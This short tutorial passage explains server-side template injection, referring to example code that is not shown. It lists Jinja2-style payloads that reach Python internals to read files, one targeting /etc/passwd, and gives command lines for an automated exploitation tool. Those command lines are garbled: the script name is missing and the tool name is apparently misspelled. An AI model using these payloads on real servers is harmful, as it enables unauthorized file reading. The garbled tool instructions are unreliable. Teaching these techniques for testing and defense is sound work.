This is when a user is able to pass in a parameter that can control the template engine that is running on the server.

For example in the code above we can input whatever in the field name and then that would be presented on the web page

We can use certain payloads from this repository : Side Template Injection#basic-injection

{{ ''.__class__.__mro__[2].__subclasses__()[40]()(<file>).read()}}
{{ ''.__class__.__mro__[2].__subclasses__()[40]()('/etc/passwd').read()}} # To read passwd file

We dont have to remember these payloads we can use a automated tool to our advantage :

tqlmap :

This tool can be download via the git repo and you can use pip2 to install its requirements

How to use this :

./ -u <URL>/?<vulnparam>  # For get requests
./ -u <URL> -d '<vulnparam>'  # For post requests